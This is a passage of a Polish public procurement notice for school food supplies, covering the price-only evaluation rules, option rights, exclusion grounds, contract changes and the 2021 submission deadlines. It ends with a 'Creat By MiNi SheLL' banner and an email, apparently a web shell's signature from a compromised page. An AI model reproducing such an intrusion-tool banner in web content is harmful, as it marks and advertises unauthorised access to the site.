przedmiot zamówienia.<br/>XIV.3) Ocena ofert dokonywana będzie w ramach poszczególnych części. XIV.4) Za najkorzystniejszą<br/>zostanie uznana oferta z najniższą ceną.<br/>XIV.5) Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty<br/>o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>XIV.6) Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług, dla<br/>celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę<br/>podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>XIV.7) W ofercie, o której mowa w pkt. XIV.6), Wykonawca ma obowiązek:<br/>XIV.7.1) poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>Zamawiającego obowiązku podatkowego;XIV.7.2) wskazania nazwy (rodzaju) towaru lub usługi,<br/>których dostawa lub świadczenie będą<br/>prowadziły do powstania obowiązku podatkowego;<br/>XIV.7.3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego,<br/>bez kwoty podatku;<br/>Ogłoszenie nr 2021/BZP 00145416/01 z dnia 2021-08-11<br/>2021-08-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>XIV.7.4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie<br/>miała zastosowanie.<br/>XIV.8) Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>XIV.9) Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający<br/>wezwie Wykonawcę, którego oferta otrzymała najwyższy ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>XIV.10) W przypadku braku zgody, o której mowa w pkt. XIV.9), oferta podlega odrzuceniu, a<br/>Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres parametrów i wymagań dla przedmiotu Zamówienia opisany został w<br/>formularzu asortymentowym - szczegółowa oferta cenowa - załącznik 1A do SWZ - wymagania<br/>określone na podstawie art. 218 ust. 2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> ZAMÓWIENIE Z PRAWEM OPCJI zgodnie z art. 441 Ustawy Pzp – Zamawiający zastrzega<br/>sobie, że określił ilość przedmiotu Zamówienia niezbędną do obliczenia ceny przez<br/>Wykonawcę(zamówienie podstawowe). Jednocześnie korzystając z prawa opcji w trakcie<br/>realizacji Umowy -Zamawiający dopuszcza możliwość jednostronnego zwiększenia lub<br/>zmniejszenia przez siebiewartości Umowy w granicach +20% (zamówienie maksymalne opcja<br/>120%) / albo -30%(zamówienie minimalne opcja 70%) - poprzez zwiększenie lub zmniejszenie<br/>ilości zamówionego Towaru, przy zachowaniu jego cen jednostkowych. Okoliczności związane z<br/>uruchomieniem opcji plus albo minus – mogą być spowodowane, w szczególności, spadkiem lub<br/>wzrostem liczby uczniów, a tym samym ilości wykonywanych procedur z użyciem Towaru.<br/>Możliwość skorzystania z prawa opcji przez Zamawiającego opisana została w załączniku nr 3<br/>do SWZ -projektowane postanowienia umowy w sprawie zamówienia publicznego <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XIV.1) Zamawiający do etapu oceny ofert pod względem ustalonych w<br/>pkt. XIV.2) kryteriów zakwalifikuje oferty spełniające następujące wymagania:<br/>XIV.1.1) oferta została złożona w określonym przez Zamawiającego terminie,<br/>XIV.1.2) złożone przez Wykonawcę dokumenty (oświadczenia) potwierdzają spełnianie przez niego<br/>warunków udziału w Postępowaniu określone w SWZ,<br/>XIV.1.3) złożone oświadczenia i wymagane dokumenty są aktualne, zostały złożone w odpowiedniej<br/>formie i są podpisane przez osoby uprawnione do reprezentowania Wykonawcy,<br/>XIV.1.4) oferta nie podlega odrzuceniu.<br/>XIV.2) Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny, z uwagi na fakt,<br/>iż Zamawiający w opisie przedmiotu zamówienia określił wymagania jakościowe<br/>odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia.<br/>XIV.3) Ocena ofert dokonywana będzie w ramach poszczególnych części. XIV.4) Za najkorzystniejszą<br/>zostanie uznana oferta z najniższą ceną.<br/>XIV.5) Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty<br/>o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>XIV.6) Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług, dla<br/>celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę<br/>podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>XIV.7) W ofercie, o której mowa w pkt. XIV.6), Wykonawca ma obowiązek:<br/>XIV.7.1) poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>Zamawiającego obowiązku podatkowego;XIV.7.2) wskazania nazwy (rodzaju) towaru lub usługi,<br/>których dostawa lub świadczenie będą<br/>prowadziły do powstania obowiązku podatkowego;<br/>XIV.7.3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego,<br/>bez kwoty podatku;<br/>Ogłoszenie nr 2021/BZP 00145416/01 z dnia 2021-08-11<br/>2021-08-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>XIV.7.4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie<br/>miała zastosowanie.<br/>XIV.8) Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>XIV.9) Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający<br/>wezwie Wykonawcę, którego oferta otrzymała najwyższy ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>XIV.10) W przypadku braku zgody, o której mowa w pkt. XIV.9), oferta podlega odrzuceniu, a<br/>Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została<br/>najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy Pzp, o braku przynależności do<br/>tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, do tej samej grupy kapitałowej wraz<br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór przedmiotowego oświadczenia<br/>stanowi załącznik nr 2B do SWZ 2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy,sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć: formularz asortymentowy - szczegółowa oferta cenowa sporządzony<br/>odpowiednio wg załącznika nr 1A do SWZ. Formularz nie podlega uzupełnieniu. (Zamawiający<br/>prosi o dołączenie do oferty wypełnionego dokumentu w formie elektronicznej, postaci<br/>elektronicznej (w wersji edytowalnej) Formularz winien zawierać wszystkie ewentualne zmiany<br/>wprowadzone w czasie trwania postępowania), pełnomocnictwo upoważniające do złożenia<br/>oferty, o ile ofertę składa pełnomocnik;pełnomocnictwo dla pełnomocnika do reprezentowania w<br/>postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert<br/>składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia; pisemne<br/>zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji X.9.6) pisemne<br/>zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji Zamówienia - dotyczy Wykonawców powołujący się na zasoby podmiotów<br/>trzecich <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie Zamówienia.2) Od wykonawców<br/>wspólnie ubiegających się o udzielenie Zamówienia Zamawiający nie wymaga posiadania<br/>określonej formy prawnej w celu złożenia oferty.3) W przypadku gdy Wykonawcy wspólnie<br/>ubiegają się o udzielenie Zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>Postępowaniu albo do reprezentowania ich w Postępowaniu i zawarcia Umowy.4) Wykonawcy<br/>wspólnie ubiegający się o udzielenie Zamówienia, są zobowiązani do złożenia wofercie<br/>dokumentu pełnomocnictwa ustanawiającego pełnomocnika, o którym mowa w ppkt. SWZ.<br/>Pełnomocnictwo zawierać powinno umocowanie do reprezentowania ich w Postępowaniu,albo<br/>do reprezentowania w Postępowaniu i zawarcia Umowy. Pełnomocnictwo należy przedłożyć w<br/>formie opisanej w pkt. X.13) SWZ.5) Korespondencja oraz komunikacja w Postępowaniu, po<br/>otwarciu ofert, dokonywana będzie wyłącznie z pełnomocnikiem, o którym mowa w ppkt.<br/>V.9.3)6)<br/>Wykonawcy wspólnie ubiegających się o udzielenie Zamówienia, ponoszą<br/>solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonaniaumowy7) Niedopuszczalne są zmiany w składzie grupy Wykonawców wspólnie<br/>ubiegających się o Zamówienie po terminie składania ofert.8) W przypadku wspólnego<br/>ubiegania<br/>się o zamówienie przez Wykonawców, Oświadczenie, o którym mowa w pkt. V.1.1) SWZ, składa<br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.9) W przypadku wspólnego ubiegania się o<br/>udzielnie zamówienia dokumenty i oświadczenia wskazane w pkt. V.2.1) – V.2.2) SWZ składa<br/>również Wykonawca wspólnie ubiegający się o udzielnie zamówienia. Postanowienia pkt. V.8)<br/>SWZ stosuje się odpowiednio. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.2. Zakazuje się<br/>istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, z zastrzeżeniem zapisów niniejszego paragrafu.3. Wykonawca<br/>zobowiązuje się do nie zwiększania cen jednostkowych netto określonych w ofercie przez okres<br/>trwania Umowy, przy czym w czasie jej obowiązywania ceny brutto ulegają zmianie w przypadku<br/>wzrostu/spadku stawki podatku VAT. W przypadku urzędowej zmiany stawki VAT,<br/>uwzględnienie nowej stawki nastąpi automatycznie w dacie określonej przez właściwe przepisy<br/>prawa, bez konieczności zawierania odrębnego aneksu. 4. W przypadku wycofania z produkcji<br/>lub braku dostępności na rynku określonego artykułu spożywczego spowodowanego czynnikami<br/>niezależnymi od Wykonawcy, dopuszcza się możliwość, w uzgodnieniu z Zamawiającym,zmiany i zastąpienia go innym artykułem o cechach fizycznych i walorach smakowych nie<br/>gorszych od artykułu wycofanego lub niedostępnego, z zachowaniem jego ceny i przy<br/>zachowaniu pisemnej formy informacji o zaistniałej zamianie. W przypadku zmiany wielkości<br/>opakowania wprowadzonej przez producenta, Strony dopuszczają zmianę ceny za zbiorcze<br/>opakowanie Towarów objętych umową z zachowaniem jednak zasady proporcjonalności w<br/>stosunku do ceny jednostkowej poszczególnych Towarów objętej Umową.5. Za zgodą<br/>Zamawiającego Wykonawca może zaoferować odpowiednik, po cenie nie wyższej niż cena<br/>produktu objętego Umową. 6. Zamawiający każdorazowo dopuszcza dostawy poszczególnych<br/>Towarów objętych Umową po cenach niższych niż określone w Umowie.Wystawienie faktury z<br/>ceną niższą niż wymieniona w załączniku nr 1 do Umowy jest równoznaczne z zaoferowaniem<br/>przez Wykonawcę niższej ceny oraz nie wymaga sporządzenia aneksu.7. Strony dopuszczają<br/>możliwość zmiany terminu realizacji w przypadku nie zrealizowania wartości Umowy na<br/>poziomie min. 70% w terminie jej obowiązywania, przewiduje się możliwość jej przedłużenia o<br/>czas niezbędny do zrealizowania ww. wartości na zasadach Przedłużenie terminu<br/>obowiązywania Umowy może nastąpić na wniosek każdej ze Stron. W przypadku braku zgody<br/>jednej ze Stron na przedłużenie obowiązywania Umowy, Wykonawcy nie przysługuje wobec<br/>Zamawiającego roszczenie odszkodowawcze z tytułu nie przedłużenia okresu realizacji<br/>Zamówienia. 8. W przypadku zmiany terminu realizacji, o którym mowa w ust. 7., po upływie<br/>12miesięcy od dnia zawarcia Umowy, Strony dopuszczają możliwość dokonywania zmiany<br/>Umowy, poprzez sporządzenie aneksu, w zakresie zmiany wysokości należnego Wykonawcy<br/>wynagrodzenia w przypadku zmiany: a. stawki podatku od towarów i usług oraz podatku<br/>akcyzowego, b.wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej<br/>stawki godzinowej,ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę,c. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie<br/>zdrowotne, d. zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o<br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania Zamówienia przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia zmiany, wycofania oferty” dostępnego na ePUAP i udostępnionego również na miniPortalu.Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego Postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com